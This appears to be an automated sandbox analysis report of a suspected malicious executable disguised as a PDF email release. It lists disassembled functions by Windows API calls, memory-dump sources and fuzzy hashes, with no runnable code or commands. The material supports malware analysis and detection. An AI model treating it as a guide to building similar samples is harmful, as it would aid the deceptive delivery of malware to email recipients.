                                                                                                          • __mtterm.LIBCMT ref: 00779AF4
                                                                                                            • Part of subcall function 00779B5C: DeleteCriticalSection.KERNEL32(00000000,00000000,?,?,00779AF9,00777CD0,0080A0B8,00000014), ref: 00779C56
                                                                                                            • Part of subcall function 00779B5C: _free.LIBCMT ref: 00779C5D
                                                                                                            • Part of subcall function 00779B5C: DeleteCriticalSection.KERNEL32(0080EC00,?,?,00779AF9,00777CD0,0080A0B8,00000014), ref: 00779C7F
                                                                                                          • __calloc_crt.LIBCMT ref: 00779B19
                                                                                                          • __initptd.LIBCMT ref: 00779B3B
                                                                                                          • GetCurrentThreadId.KERNEL32 ref: 00779B42
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000000.00000002.2101307476.0000000000751000.00000020.00000001.01000000.00000003.sdmp, Offset: 00750000, based on PE: true
                                                                                                          • Associated: 00000000.00000002.2101258607.0000000000750000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2101351603.00000000007DF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2101351603.0000000000804000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2101406054.000000000080E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2101460697.0000000000817000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_0_2_750000_PK241200518-EMAIL RELEASE-pdf.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: AddressProc$CriticalDeleteSection$CurrentEncodeHandleModulePointerThread__calloc_crt__init_pointers__initp_misc_winsig__initptd__mtinitlocks__mtterm_free
                                                                                                          • String ID:
                                                                                                          • API String ID: 3567560977-0
                                                                                                          • Opcode ID: 29653213e43ad3eec37558e7532a7f1661287f13fc702aab895493fe8b0596bd
                                                                                                          • Instruction ID: b1ae80c98b44099a1cebbce81e289c5211cb07d82ed196b64ba20ff9aaa8c62a
                                                                                                          • Opcode Fuzzy Hash: 29653213e43ad3eec37558e7532a7f1661287f13fc702aab895493fe8b0596bd
                                                                                                          • Instruction Fuzzy Hash: 26F0627260B711E9EE747674BC0BA4A37919F027B0B21CA2AF65CC50E2FE18884141A1
                                                                                                          Function 0077406B Relevance: 10.5, APIs: 4, Strings: 2, Instructions: 19libraryloaderCOMMONLIBRARYCODE
                                                                                                          Download Yara Rule
                                                                                                          APIs
                                                                                                          • LoadLibraryExW.KERNEL32(combase.dll,00000000,00000800,RoUninitialize,00773F85), ref: 00774085
                                                                                                          • GetProcAddress.KERNEL32(00000000), ref: 0077408C
                                                                                                          • EncodePointer.KERNEL32(00000000), ref: 00774097
                                                                                                          • DecodePointer.KERNEL32(00773F85), ref: 007740B2
                                                                                                          Strings
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000000.00000002.2101307476.0000000000751000.00000020.00000001.01000000.00000003.sdmp, Offset: 00750000, based on PE: true
                                                                                                          • Associated: 00000000.00000002.2101258607.0000000000750000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2101351603.00000000007DF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2101351603.0000000000804000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2101406054.000000000080E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2101460697.0000000000817000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_0_2_750000_PK241200518-EMAIL RELEASE-pdf.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: Pointer$AddressDecodeEncodeLibraryLoadProc
                                                                                                          • String ID: RoUninitialize$combase.dll
                                                                                                          • API String ID: 3489934621-2819208100
                                                                                                          • Opcode ID: ce6998fcc372682cd91a9d4a98e513265ae315eef54e85b23009c1cfecec5fe0
                                                                                                          • Instruction ID: feb50810dd796c04fd5a737bc75643f23c2eb575c21475d7f8d475493baef268
                                                                                                          • Opcode Fuzzy Hash: ce6998fcc372682cd91a9d4a98e513265ae315eef54e85b23009c1cfecec5fe0
                                                                                                          • Instruction Fuzzy Hash: 28E092B0682204BBEA11AF61ED09B853AB8BB04782F11C036F202E11A0CBBA4611CA18
                                                                                                          Function 007B64B8 Relevance: 9.2, APIs: 6, Instructions: 205COMMON
                                                                                                          Download Yara Rule
                                                                                                          APIs
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000000.00000002.2101307476.0000000000751000.00000020.00000001.01000000.00000003.sdmp, Offset: 00750000, based on PE: true
                                                                                                          • Associated: 00000000.00000002.2101258607.0000000000750000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2101351603.00000000007DF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2101351603.0000000000804000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2101406054.000000000080E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2101460697.0000000000817000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_0_2_750000_PK241200518-EMAIL RELEASE-pdf.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: _memmove$__itow__swprintf
                                                                                                          • String ID:
                                                                                                          • API String ID: 3253778849-0
                                                                                                          • Opcode ID: 24132d38f82a37ab7f3bdb1bcae677fd77bf2f02b632f77fef73ae5b321cb7ec
                                                                                                          • Instruction ID: 06b23fc0b8c3901d881c54472ffab3208fe831f062f5f357f6c90611b982f6b7
                                                                                                          • Opcode Fuzzy Hash: 24132d38f82a37ab7f3bdb1bcae677fd77bf2f02b632f77fef73ae5b321cb7ec
                                                                                                          • Instruction Fuzzy Hash: 1B616A3050065ADBCF11EF60CC8ABFE37A5AF05308F048559FE595B192DBBCA919CB90
                                                                                                          Function 007D01E4 Relevance: 9.2, APIs: 6, Instructions: 167registryCOMMON
                                                                                                          Download Yara Rule
                                                                                                          APIs
                                                                                                            • Part of subcall function 00757DE1: _memmove.LIBCMT ref: 00757E22
                                                                                                            • Part of subcall function 007D0E1A: CharUpperBuffW.USER32(?,?,?,?,?,?,?,007CFDAD,?,?), ref: 007D0E31
                                                                                                          • RegConnectRegistryW.ADVAPI32(?,?,?), ref: 007D02BD
                                                                                                          • RegOpenKeyExW.ADVAPI32(?,?,00000000,?,?), ref: 007D02FD
                                                                                                          • RegCloseKey.ADVAPI32(?,00000001,00000000), ref: 007D0320
                                                                                                          • RegEnumValueW.ADVAPI32(?,-00000001,?,?,00000000,?,00000000,00000000), ref: 007D0349
                                                                                                          • RegCloseKey.ADVAPI32(?,?,00000000), ref: 007D038C
                                                                                                          • RegCloseKey.ADVAPI32(00000000), ref: 007D0399
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000000.00000002.2101307476.0000000000751000.00000020.00000001.01000000.00000003.sdmp, Offset: 00750000, based on PE: true
                                                                                                          • Associated: 00000000.00000002.2101258607.0000000000750000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2101351603.00000000007DF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2101351603.0000000000804000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2101406054.000000000080E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2101460697.0000000000817000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_0_2_750000_PK241200518-EMAIL RELEASE-pdf.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: Close$BuffCharConnectEnumOpenRegistryUpperValue_memmove
                                                                                                          • String ID:
                                                                                                          • API String ID: 4046560759-0
                                                                                                          • Opcode ID: 9ab3dfe41b552248a49853b28df2a95eb9796287c18695e0cb4c06854809adaf
                                                                                                          • Instruction ID: 372aa2f58df16339caeb5260e5ff970aeb960e247ccbc20850bb4cbd0c89f644
                                                                                                          • Opcode Fuzzy Hash: 9ab3dfe41b552248a49853b28df2a95eb9796287c18695e0cb4c06854809adaf
                                                                                                          • Instruction Fuzzy Hash: C2514B71108200DFC714EF64D849EAABBF9FF85314F04491EF945872A1DB79E905CB92
                                                                                                          Function 007D5799 Relevance: 9.2, APIs: 6, Instructions: 160windowCOMMON
                                                                                                          Download Yara Rule
                                                                                                          APIs
                                                                                                          • GetMenu.USER32(?), ref: 007D57FB
                                                                                                          • GetMenuItemCount.USER32(00000000), ref: 007D5832
                                                                                                          • GetMenuStringW.USER32(00000000,00000000,?,00007FFF,00000400), ref: 007D585A
                                                                                                          • GetMenuItemID.USER32(?,?), ref: 007D58C9
                                                                                                          • GetSubMenu.USER32(?,?), ref: 007D58D7
                                                                                                          • PostMessageW.USER32(?,00000111,?,00000000), ref: 007D5928
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000000.00000002.2101307476.0000000000751000.00000020.00000001.01000000.00000003.sdmp, Offset: 00750000, based on PE: true
                                                                                                          • Associated: 00000000.00000002.2101258607.0000000000750000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2101351603.00000000007DF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2101351603.0000000000804000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2101406054.000000000080E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2101460697.0000000000817000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_0_2_750000_PK241200518-EMAIL RELEASE-pdf.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: Menu$Item$CountMessagePostString
                                                                                                          • String ID:
                                                                                                          • API String ID: 650687236-0
                                                                                                          • Opcode ID: 81550ece78d79b56c4e1db90d64a01dcc8fa2b3b680329e616a5980a7713aa7b
                                                                                                          • Instruction ID: 96fb92fa7cda289cdca0eb176575ac4a100d3e803765323fff0606d549211d44
                                                                                                          • Opcode Fuzzy Hash: 81550ece78d79b56c4e1db90d64a01dcc8fa2b3b680329e616a5980a7713aa7b
                                                                                                          • Instruction Fuzzy Hash: D4516E31E01615EFCF11EF64C845AAEB7B5EF48320F14806AED06BB351CB78AE419B94
                                                                                                          Function 007AEEEC Relevance: 9.2, APIs: 6, Instructions: 159COMMON
                                                                                                          Download Yara Rule
                                                                                                          APIs
                                                                                                          • VariantInit.OLEAUT32(?), ref: 007AEF06
                                                                                                          • VariantClear.OLEAUT32(00000013), ref: 007AEF78
                                                                                                          • VariantClear.OLEAUT32(00000000), ref: 007AEFD3
                                                                                                          • _memmove.LIBCMT ref: 007AEFFD
                                                                                                          • VariantClear.OLEAUT32(?), ref: 007AF04A
                                                                                                          • VariantChangeType.OLEAUT32(?,?,00000000,00000013), ref: 007AF078
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000000.00000002.2101307476.0000000000751000.00000020.00000001.01000000.00000003.sdmp, Offset: 00750000, based on PE: true
                                                                                                          • Associated: 00000000.00000002.2101258607.0000000000750000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2101351603.00000000007DF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2101351603.0000000000804000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2101406054.000000000080E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2101460697.0000000000817000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_0_2_750000_PK241200518-EMAIL RELEASE-pdf.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: Variant$Clear$ChangeInitType_memmove
                                                                                                          • String ID:
                                                                                                          • API String ID: 1101466143-0
                                                                                                          • Opcode ID: a951d0dffb7c2e3b282f979901e8daa178b99e110e6e6a6eba7764405e029e23
                                                                                                          • Instruction ID: 33d3ec1a085fe09a3f05538afd9c73b53ffc47ccebe1ae8d5e7ab5bb5b471f04
                                                                                                          • Opcode Fuzzy Hash: a951d0dffb7c2e3b282f979901e8daa178b99e110e6e6a6eba7764405e029e23
                                                                                                          • Instruction Fuzzy Hash: 16515E75A00209DFDB14DF58C884AAAB7B8FF8D314B15856AED59DB301E335E911CF90
                                                                                                          Function 007B220A Relevance: 9.1, APIs: 6, Instructions: 138windowCOMMON
                                                                                                          Download Yara Rule
                                                                                                          APIs
                                                                                                          • _memset.LIBCMT ref: 007B2258
                                                                                                          • GetMenuItemInfoW.USER32(?,000000FF,00000000,00000030), ref: 007B22A3
                                                                                                          • IsMenu.USER32(00000000), ref: 007B22C3
                                                                                                          • CreatePopupMenu.USER32 ref: 007B22F7
                                                                                                          • GetMenuItemCount.USER32(000000FF), ref: 007B2355
                                                                                                          • InsertMenuItemW.USER32(00000000,?,00000001,00000030), ref: 007B2386
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000000.00000002.2101307476.0000000000751000.00000020.00000001.01000000.00000003.sdmp, Offset: 00750000, based on PE: true
                                                                                                          • Associated: 00000000.00000002.2101258607.0000000000750000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2101351603.00000000007DF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2101351603.0000000000804000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2101406054.000000000080E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2101460697.0000000000817000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_0_2_750000_PK241200518-EMAIL RELEASE-pdf.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: Menu$Item$CountCreateInfoInsertPopup_memset
                                                                                                          • String ID:
                                                                                                          • API String ID: 3311875123-0
                                                                                                          • Opcode ID: 1195c19135a554585206656a0b4aea5450f68583379d236a2d65b54cd05542b2
                                                                                                          • Instruction ID: eb5b8afe76023768c694a8e6fabf1adc4646d838e3fea989e78c85b3747297bf
                                                                                                          • Opcode Fuzzy Hash: 1195c19135a554585206656a0b4aea5450f68583379d236a2d65b54cd05542b2
                                                                                                          • Instruction Fuzzy Hash: FF51A070602209DBDF21DF64D888BEDBBF5BF46314F148129E811972A2D77C9946CB51
                                                                                                          Function 00751765 Relevance: 9.1, APIs: 6, Instructions: 113COMMON
                                                                                                          Download Yara Rule
                                                                                                          APIs
                                                                                                            • Part of subcall function 00752612: GetWindowLongW.USER32(?,000000EB), ref: 00752623
                                                                                                          • BeginPaint.USER32(?,?,?,?,?,?), ref: 0075179A
                                                                                                          • GetWindowRect.USER32(?,?), ref: 007517FE
                                                                                                          • ScreenToClient.USER32(?,?), ref: 0075181B
                                                                                                          • SetViewportOrgEx.GDI32(00000000,?,?,00000000), ref: 0075182C
                                                                                                          • EndPaint.USER32(?,?), ref: 00751876
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000000.00000002.2101307476.0000000000751000.00000020.00000001.01000000.00000003.sdmp, Offset: 00750000, based on PE: true
                                                                                                          • Associated: 00000000.00000002.2101258607.0000000000750000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2101351603.00000000007DF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2101351603.0000000000804000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2101406054.000000000080E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2101460697.0000000000817000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_0_2_750000_PK241200518-EMAIL RELEASE-pdf.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: PaintWindow$BeginClientLongRectScreenViewport
                                                                                                          • String ID:
                                                                                                          • API String ID: 1827037458-0
                                                                                                          • Opcode ID: 996fadc95ea903dae80c7a49dc6ff3fe9fa20145a2dfe7c8af2996c113e90f33
                                                                                                          • Instruction ID: 53a4db5d99091e1781c1801c6dc3bb7151fb4dfd1b72ad81ee80705b4443a696
                                                                                                          • Opcode Fuzzy Hash: 996fadc95ea903dae80c7a49dc6ff3fe9fa20145a2dfe7c8af2996c113e90f33
                                                                                                          • Instruction Fuzzy Hash: 29418D30504600EFD720DF24CC88BAA7BF8FB49726F144669F9A5872A1C779A849DB61
                                                                                                          Function 007DB69E Relevance: 9.1, APIs: 6, Instructions: 109windowCOMMON
                                                                                                          Download Yara Rule
                                                                                                          APIs
                                                                                                          • ShowWindow.USER32(008157B0,00000000,00E55C18,?,?,008157B0,?,007DB5A8,?,?), ref: 007DB712
                                                                                                          • EnableWindow.USER32(00000000,00000000), ref: 007DB736
                                                                                                          • ShowWindow.USER32(008157B0,00000000,00E55C18,?,?,008157B0,?,007DB5A8,?,?), ref: 007DB796
                                                                                                          • ShowWindow.USER32(00000000,00000004,?,007DB5A8,?,?), ref: 007DB7A8
                                                                                                          • EnableWindow.USER32(00000000,00000001), ref: 007DB7CC
                                                                                                          • SendMessageW.USER32(?,0000130C,?,00000000), ref: 007DB7EF
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000000.00000002.2101307476.0000000000751000.00000020.00000001.01000000.00000003.sdmp, Offset: 00750000, based on PE: true
                                                                                                          • Associated: 00000000.00000002.2101258607.0000000000750000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2101351603.00000000007DF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2101351603.0000000000804000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2101406054.000000000080E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2101460697.0000000000817000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_0_2_750000_PK241200518-EMAIL RELEASE-pdf.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: Window$Show$Enable$MessageSend
                                                                                                          • String ID:
                                                                                                          • API String ID: 642888154-0
                                                                                                          • Opcode ID: 00aeab717322b7b70e58ab44f152c4a60398f34bdba8731a301037ff5ba4d0d4
                                                                                                          • Instruction ID: 3599a0abb6ba4819557eb6835e7f2ab04c2e3d16840cd9805b7940f7f4bedc70
                                                                                                          • Opcode Fuzzy Hash: 00aeab717322b7b70e58ab44f152c4a60398f34bdba8731a301037ff5ba4d0d4
                                                                                                          • Instruction Fuzzy Hash: 77416C34601240EFDB22CF24C499B947BF1FB45320F5981BBE9598F7A2C739A85ACB50
                                                                                                          Function 007C709E Relevance: 9.1, APIs: 6, Instructions: 97COMMON
                                                                                                          Download Yara Rule
                                                                                                          APIs
                                                                                                          • GetForegroundWindow.USER32(?,?,?,?,?,?,007C4E41,?,?,00000000,00000001), ref: 007C70AC
                                                                                                            • Part of subcall function 007C39A0: GetWindowRect.USER32(?,?), ref: 007C39B3
                                                                                                          • GetDesktopWindow.USER32 ref: 007C70D6
                                                                                                          • GetWindowRect.USER32(00000000), ref: 007C70DD
                                                                                                          • mouse_event.USER32(00008001,?,?,00000001,00000001), ref: 007C710F
                                                                                                            • Part of subcall function 007B5244: Sleep.KERNEL32(?,00000000,?,?,?,?,?,?,?,?,?,?), ref: 007B52BC
                                                                                                          • GetCursorPos.USER32(?), ref: 007C713B
                                                                                                          • mouse_event.USER32(00008001,?,?,00000000,00000000), ref: 007C7199
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000000.00000002.2101307476.0000000000751000.00000020.00000001.01000000.00000003.sdmp, Offset: 00750000, based on PE: true
                                                                                                          • Associated: 00000000.00000002.2101258607.0000000000750000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2101351603.00000000007DF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2101351603.0000000000804000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2101406054.000000000080E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2101460697.0000000000817000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_0_2_750000_PK241200518-EMAIL RELEASE-pdf.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: Window$Rectmouse_event$CursorDesktopForegroundSleep
                                                                                                          • String ID:
                                                                                                          • API String ID: 4137160315-0
                                                                                                          • Opcode ID: 9fdb9bb10926882f998983f79b40331d4e925af4b490b980d8bbc8d61a6337c8
                                                                                                          • Instruction ID: 4b6cd2f278e24ce617e43b5e76553caf1b6762fcd7f1cf5dd4a33e51c36a3fcd
                                                                                                          • Opcode Fuzzy Hash: 9fdb9bb10926882f998983f79b40331d4e925af4b490b980d8bbc8d61a6337c8
                                                                                                          • Instruction Fuzzy Hash: 9531F272109309ABC724EF14D849F9BB7E9FFC8314F00491EF58597191CA38EA08CB96
                                                                                                          Function 007A8879 Relevance: 9.1, APIs: 6, Instructions: 69memoryCOMMON
                                                                                                          Download Yara Rule
                                                                                                          APIs
                                                                                                            • Part of subcall function 007A80A9: GetTokenInformation.ADVAPI32(?,00000002,?,00000000,?), ref: 007A80C0
                                                                                                            • Part of subcall function 007A80A9: GetLastError.KERNEL32(?,00000002,?,00000000,?), ref: 007A80CA
                                                                                                            • Part of subcall function 007A80A9: GetProcessHeap.KERNEL32(00000008,?,?,00000002,?,00000000,?), ref: 007A80D9
                                                                                                            • Part of subcall function 007A80A9: HeapAlloc.KERNEL32(00000000,?,00000002,?,00000000,?), ref: 007A80E0
                                                                                                            • Part of subcall function 007A80A9: GetTokenInformation.ADVAPI32(?,00000002,00000000,?,?,?,00000002,?,00000000,?), ref: 007A80F6
                                                                                                          • GetLengthSid.ADVAPI32(?,00000000,007A842F), ref: 007A88CA
                                                                                                          • GetProcessHeap.KERNEL32(00000008,00000000), ref: 007A88D6
                                                                                                          • HeapAlloc.KERNEL32(00000000), ref: 007A88DD
                                                                                                          • CopySid.ADVAPI32(00000000,00000000,?), ref: 007A88F6
                                                                                                          • GetProcessHeap.KERNEL32(00000000,00000000,007A842F), ref: 007A890A
                                                                                                          • HeapFree.KERNEL32(00000000), ref: 007A8911
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000000.00000002.2101307476.0000000000751000.00000020.00000001.01000000.00000003.sdmp, Offset: 00750000, based on PE: true
                                                                                                          • Associated: 00000000.00000002.2101258607.0000000000750000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2101351603.00000000007DF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2101351603.0000000000804000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2101406054.000000000080E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2101460697.0000000000817000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_0_2_750000_PK241200518-EMAIL RELEASE-pdf.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: Heap$Process$AllocInformationToken$CopyErrorFreeLastLength
                                                                                                          • String ID:
                                                                                                          • API String ID: 3008561057-0
                                                                                                          • Opcode ID: 3777203d9188bf094527ed6023f400b2a86b3ffe35046292d51c79a175f68c42
                                                                                                          • Instruction ID: 979431d642ad2e4e9b1b8c9f5a4809581773d52f533f9983367776b0f2eb9a88
                                                                                                          • Opcode Fuzzy Hash: 3777203d9188bf094527ed6023f400b2a86b3ffe35046292d51c79a175f68c42
                                                                                                          • Instruction Fuzzy Hash: 7211B471512209FFDB509F94DC09BBF7778FB86311F148129E89697210CB3AAE00DB61
                                                                                                          Function 007A85B1 Relevance: 9.1, APIs: 6, Instructions: 65processCOMMON
                                                                                                          Download Yara Rule
                                                                                                          APIs
                                                                                                          • GetCurrentProcess.KERNEL32(0000000A,00000004), ref: 007A85E2
                                                                                                          • OpenProcessToken.ADVAPI32(00000000), ref: 007A85E9
                                                                                                          • CreateEnvironmentBlock.USERENV(?,00000004,00000001), ref: 007A85F8
                                                                                                          • CloseHandle.KERNEL32(00000004), ref: 007A8603
                                                                                                          • CreateProcessWithLogonW.ADVAPI32(?,?,?,00000000,00000000,?,?,00000000,?,?,?), ref: 007A8632
                                                                                                          • DestroyEnvironmentBlock.USERENV(00000000), ref: 007A8646
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000000.00000002.2101307476.0000000000751000.00000020.00000001.01000000.00000003.sdmp, Offset: 00750000, based on PE: true
                                                                                                          • Associated: 00000000.00000002.2101258607.0000000000750000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2101351603.00000000007DF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2101351603.0000000000804000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2101406054.000000000080E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2101460697.0000000000817000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_0_2_750000_PK241200518-EMAIL RELEASE-pdf.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: Process$BlockCreateEnvironment$CloseCurrentDestroyHandleLogonOpenTokenWith
                                                                                                          • String ID:
                                                                                                          • API String ID: 1413079979-0
                                                                                                          • Opcode ID: e235678695c3f86b0fa186ed8fc8aa9fea3b55e2d9478a52d54d13419f7e9e3b
                                                                                                          • Instruction ID: 3e7a8f9ec201428e81dc1f0fe1b59d3ea10f52c4899618827ae643613ca9bec1
                                                                                                          • Opcode Fuzzy Hash: e235678695c3f86b0fa186ed8fc8aa9fea3b55e2d9478a52d54d13419f7e9e3b
                                                                                                          • Instruction Fuzzy Hash: 451189B2502209ABDF01CFA4DD48BDE7BB8EF49304F048125FE01A2161C77A8D60EB61
                                                                                                          Function 007AB790 Relevance: 9.0, APIs: 6, Instructions: 49COMMON
                                                                                                          Download Yara Rule
                                                                                                          APIs
                                                                                                          • GetDC.USER32(00000000), ref: 007AB7B5
                                                                                                          • GetDeviceCaps.GDI32(00000000,00000058), ref: 007AB7C6
                                                                                                          • GetDeviceCaps.GDI32(00000000,0000005A), ref: 007AB7CD
                                                                                                          • ReleaseDC.USER32(00000000,00000000), ref: 007AB7D5
                                                                                                          • MulDiv.KERNEL32(000009EC,?,00000000), ref: 007AB7EC
                                                                                                          • MulDiv.KERNEL32(000009EC,?,?), ref: 007AB7FE
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000000.00000002.2101307476.0000000000751000.00000020.00000001.01000000.00000003.sdmp, Offset: 00750000, based on PE: true
                                                                                                          • Associated: 00000000.00000002.2101258607.0000000000750000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2101351603.00000000007DF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2101351603.0000000000804000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2101406054.000000000080E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2101460697.0000000000817000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_0_2_750000_PK241200518-EMAIL RELEASE-pdf.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: CapsDevice$Release
                                                                                                          • String ID:
                                                                                                          • API String ID: 1035833867-0
                                                                                                          • Opcode ID: 50acc1ea139b7d4df707b8367dce50c196cc4af3050f7b04b1f4b1ade6ed5ef1
                                                                                                          • Instruction ID: 37f89204064d6f2cbaf1efa02041a9a96f9a608b73e8ea56a3496b948b0b2074
                                                                                                          • Opcode Fuzzy Hash: 50acc1ea139b7d4df707b8367dce50c196cc4af3050f7b04b1f4b1ade6ed5ef1
                                                                                                          • Instruction Fuzzy Hash: 0C018475E01209BBEB109BA69C49A5EBFB8EB89311F008076FA04A7291D6749D00CF91
                                                                                                          Function 00770162 Relevance: 9.0, APIs: 6, Instructions: 44keyboardCOMMON
                                                                                                          Download Yara Rule
                                                                                                          APIs
                                                                                                          • MapVirtualKeyW.USER32(0000005B,00000000), ref: 00770193
                                                                                                          • MapVirtualKeyW.USER32(00000010,00000000), ref: 0077019B
                                                                                                          • MapVirtualKeyW.USER32(000000A0,00000000), ref: 007701A6
                                                                                                          • MapVirtualKeyW.USER32(000000A1,00000000), ref: 007701B1
